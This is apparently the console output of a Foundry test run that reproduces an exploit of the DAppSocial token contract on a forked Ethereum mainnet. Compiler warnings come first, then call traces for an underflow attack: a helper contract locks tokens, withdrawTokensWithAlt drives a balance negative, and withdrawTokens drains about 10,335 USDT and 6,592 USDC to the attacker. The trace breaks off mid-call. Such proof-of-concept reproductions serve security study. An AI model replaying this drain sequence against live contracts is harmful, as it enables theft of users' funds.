Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.40s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-09/DAppSocial_exp.sol:28:5:
   |
28 |     IUSDT private constant USDT = IUSDT(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-09/DAppSocial_exp.sol:29:5:
   |
29 |     IERC20 private constant USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-09/DAppSocial_exp.sol:79:5:
   |
79 |     IUSDT private constant USDT = IUSDT(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-09/DAppSocial_exp.sol:80:5:
   |
80 |     IERC20 private constant USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5159): "selfdestruct" has been deprecated. Note that, starting from the Cancun hard fork, the underlying opcode no longer deletes the code and data associated with an account and only transfers its Ether to the beneficiary, unless executed in the same transaction in which the contract was created (see EIP-6780). Any use in newly deployed contracts is strongly discouraged even if the new behavior is taken into account. Future changes to the EVM might further reduce the functionality of the opcode.
   --> src/test/2023-09/DAppSocial_exp.sol:106:9:
    |
106 |         selfdestruct(owner);
    |         ^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 533.86ms (9.47ms CPU time)

Ran 1 test for src/test/2023-09/DAppSocial_exp.sol:DAppTest
[PASS] testExploit() (gas: 1268628)
Logs:
  Attacker USDT balance before exploit: 5.000000
  Attacker USDC balance before exploit: 5.000000
  Attacker USDT balance after exploit: 10339.882398
  Attacker USDC balance after exploit: 6596.359286

Traces:
  [5821] DAppTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18048982 [1.804e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], "USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], "DAppSocial")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1517028] DAppTest::testExploit()
    ├─ [5031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [1031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7])
    │   └─ ← [Return] [0x000000000000000000000000000000000000000000000000000000000000000a, 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78], []
    ├─ [0] VM::load(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], slot: 49784443915320261189887103614045882155521089248264299114442679287293484801912 [4.978e76])
    ├─ [0] VM::load(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [1031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [1031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 49784443915320261189887103614045882155521089248264299114442679287293484801912 [4.978e76])
    ├─ [0] VM::load(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78, 0x00000000000000000000000000000000000000000000000000000000004c4b40)
    │   └─ ← [Return]
    ├─ [1031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5000000 [5e6]
    ├─ [9815] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [1315] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48])
    │   └─ ← [Return] [0x10d6a54a4754c8869d6886b5f5d7fbfa5b4522237ea5c60d11bc4e7a1ff9390b, 0x7050c9e0f4ca769c69bd3a8ef740bc37934f8e2c036e5a723fd8ee048ed3f8c3, 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac], []
    ├─ [0] VM::load(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], slot: 106068891970248696789493712859882542862066930050875226902812495036911416507820 [1.06e77])
    ├─ [0] VM::load(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [1315] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [0] VM::store(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [1315] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 106068891970248696789493712859882542862066930050875226902812495036911416507820 [1.06e77])
    ├─ [0] VM::load(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac, 0x00000000000000000000000000000000000000000000000000000000004c4b40)
    │   └─ ← [Return]
    ├─ [1315] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 5000000 [5e6]
    │   └─ ← [Return] 5000000 [5e6]
    ├─ [549301] → new HelperExploitContract@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   └─ ← [Return] 2743 bytes of code
    ├─ [24953] USDT::approve(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], 2000000 [2e6])
    │   ├─ emit Approval(owner: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], value: 2000000 [2e6])
    │   ├─  storage changes:
    │   │   @ 0xfdb1926b7bf0360660b35a548f0943a8c2fd86a36041e222d8c37caed4fdb627: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   └─ ← [Stop]
    ├─ [31867] USDC::approve(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], 2000000 [2e6])
    │   ├─ [31078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], 2000000 [2e6]) [delegatecall]
    │   │   ├─ emit Approval(owner: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], value: 2000000 [2e6])
    │   │   ├─  storage changes:
    │   │   │   @ 0x21143c76a2f794dda2583860a169a177b6d061bd1b90ae068b58fab0f80ba864: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [1031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5000000 [5e6]
    ├─ emit log_named_decimal_uint(key: "Attacker USDT balance before exploit", val: 5000000 [5e6], decimals: 6)
    ├─ [1315] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 5000000 [5e6]
    │   └─ ← [Return] 5000000 [5e6]
    ├─ [3164] USDC::decimals() [staticcall]
    │   ├─ [2381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance before exploit", val: 5000000 [5e6], decimals: 6)
    ├─ [45954] DAppSocial::depositTokens(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 2000000 [2e6])
    │   ├─ [18124] USDT::transferFrom(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], 2000000 [2e6])
    │   │   ├─ emit Transfer(from: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], value: 2000000 [2e6])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000000000000000000004c4b40 → 0x00000000000000000000000000000000000000000000000000000000002dc6c0
    │   │   │   @ 0xfdb1926b7bf0360660b35a548f0943a8c2fd86a36041e222d8c37caed4fdb627: 0x00000000000000000000000000000000000000000000000000000000001e8480 → 0
    │   │   │   @ 0x2c7289449f0a0be4615235d78489f9e313e8c0be2f3cdabe3a7fb16c07b1f1ee: 0x000000000000000000000000000000000000000000000000000000026801ca5e → 0x0000000000000000000000000000000000000000000000000000000268204ede
    │   │   └─ ← [Stop]
    │   ├─ emit TokenDeposited(param0: USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], param1: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 2000000 [2e6])
    │   ├─  storage changes:
    │   │   @ 0xe63fddd7f8249695b01d1aa3a37dc0c1d4b203c3113ce6f6b10a7cb3b8c38619: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   └─ ← [Stop]
    ├─ [48834] HelperExploitContract::exploit(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], false)
    │   ├─ [47217] DAppSocial::lockTokens(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit LockTokens(param0: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param1: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x174b1fcc214043897dfbfc97018d4bf29434fce65a1e4a9a69124ace49aee40c: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0xc7a7482cccbcbd9b90d4e07d15adaa519d01005047d2a62345d76f14ad0d6969: 0 → 0x0000000000000000000000000000000000000000000000000000000064f33187
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [33116] DAppSocial::withdrawTokensWithAlt(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1000000 [1e6])
    │   ├─ [6901] USDT::transfer(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000 [1e6])
    │   │   ├─ emit Transfer(from: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], to: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000 [1e6])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000000000000000000002dc6c0 → 0x00000000000000000000000000000000000000000000000000000000003d0900
    │   │   │   @ 0x2c7289449f0a0be4615235d78489f9e313e8c0be2f3cdabe3a7fb16c07b1f1ee: 0x0000000000000000000000000000000000000000000000000000000268204ede → 0x0000000000000000000000000000000000000000000000000000000268110c9e
    │   │   └─ ← [Stop]
    │   ├─ emit TokenWithdrawn(param0: USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], param1: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1000000 [1e6])
    │   ├─  storage changes:
    │   │   @ 0x8438f1ca820bb8cdb77c43c60fb3a47d1fd8b3de4525a2178685fde5afdef3c3: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0bdc0
    │   └─ ← [Stop]
    ├─ [43540] HelperExploitContract::exploit(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], true)
    │   ├─ [1031] USDT::balanceOf(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1]) [staticcall]
    │   │   └─ ← [Return] 10335882398 [1.033e10]
    │   ├─ [31035] DAppSocial::withdrawTokens(USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], 10335882398 [1.033e10])
    │   │   ├─ [26801] USDT::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 10335882398 [1.033e10])
    │   │   │   ├─ emit Transfer(from: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 10335882398 [1.033e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2c7289449f0a0be4615235d78489f9e313e8c0be2f3cdabe3a7fb16c07b1f1ee: 0x0000000000000000000000000000000000000000000000000000000268110c9e → 0
    │   │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0 → 0x0000000000000000000000000000000000000000000000000000000268110c9e
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit TokenWithdrawn(param0: USDT: [0xdAC17F958D2ee523a2206206994597C13D831ec7], param1: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param2: 10335882398 [1.033e10])
    │   │   ├─  storage changes:
    │   │   │   @ 0x8438f1ca820bb8cdb77c43c60fb3a47d1fd8b3de4525a2178685fde5afdef3c3: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0bdc0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffd97dfb122
    │   │   └─ ← [Stop]
    │   ├─ [1031] USDT::balanceOf(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   └─ ← [Return] 10335882398 [1.033e10]
    │   ├─ [6901] USDT::transfer(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10335882398 [1.033e10])
    │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10335882398 [1.033e10])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000000000000000000003d0900 → 0x00000000000000000000000000000000000000000000000000000002684e159e
    │   │   │   @ 0x759a0d4d3edd1108537a593b654c78917502b7cb5e6648da2891162c8570ea14: 0x0000000000000000000000000000000000000000000000000000000268110c9e → 0
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [38861] DAppSocial::depositTokens(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2000000 [2e6])
    │   ├─ [10792] USDC::transferFrom(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], 2000000 [2e6])
    │   │   ├─ [9997] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], 2000000 [2e6]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], value: 2000000 [2e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x00000000000000000000000000000000000000000000000000000000004c4b40 → 0x00000000000000000000000000000000000000000000000000000000002dc6c0
    │   │   │   │   @ 0x90c3ba2964f1423abc460e2200d27a2a41798af276a5711b1fbb91b07901b562: 0x0000000000000000000000000000000000000000000000000000000188e02936 → 0x0000000000000000000000000000000000000000000000000000000188feadb6
    │   │   │   │   @ 0x21143c76a2f794dda2583860a169a177b6d061bd1b90ae068b58fab0f80ba864: 0x00000000000000000000000000000000000000000000000000000000001e8480 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ emit TokenDeposited(param0: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], param1: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 2000000 [2e6])
    │   ├─  storage changes:
    │   │   @ 0x947ab8b7bc43e4de8b04272fbded2ddd548e67f8a06cc1a9ef6e3599f5bd73d9: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   └─ ← [Stop]
    ├─ [5034] HelperExploitContract::exploit(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], false)
    │   ├─ [3417] DAppSocial::lockTokens(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit LockTokens(param0: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param1: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0)
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [31271] DAppSocial::withdrawTokensWithAlt(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1000000 [1e6])
    │   ├─ [4817] USDC::transfer(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000 [1e6])
    │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000 [1e6]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], to: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000 [1e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x90c3ba2964f1423abc460e2200d27a2a41798af276a5711b1fbb91b07901b562: 0x0000000000000000000000000000000000000000000000000000000188feadb6 → 0x0000000000000000000000000000000000000000000000000000000188ef6b76
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x00000000000000000000000000000000000000000000000000000000002dc6c0 → 0x00000000000000000000000000000000000000000000000000000000003d0900
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ emit TokenWithdrawn(param0: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], param1: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1000000 [1e6])
    │   ├─  storage changes:
    │   │   @ 0x36cff5a2ab9d747279724952977d419e50daa7eab7c912efbd52cff98cde4d16: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0bdc0
    │   └─ ← [Stop]
    ├─ [44338] HelperExploitContract::exploit(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], true)
    │   ├─ [1315] USDC::balanceOf(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1]) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1]) [delegatecall]
    │   │   │   └─ ← [Return] 6592359286 [6.592e9]
    │   │   └─ ← [Return] 6592359286 [6.592e9]
    │   ├─ [33190] DAppSocial::withdrawTokens(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 6592359286 [6.592e9])
    │   │   ├─ [28717] USDC::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 6592359286 [6.592e9])
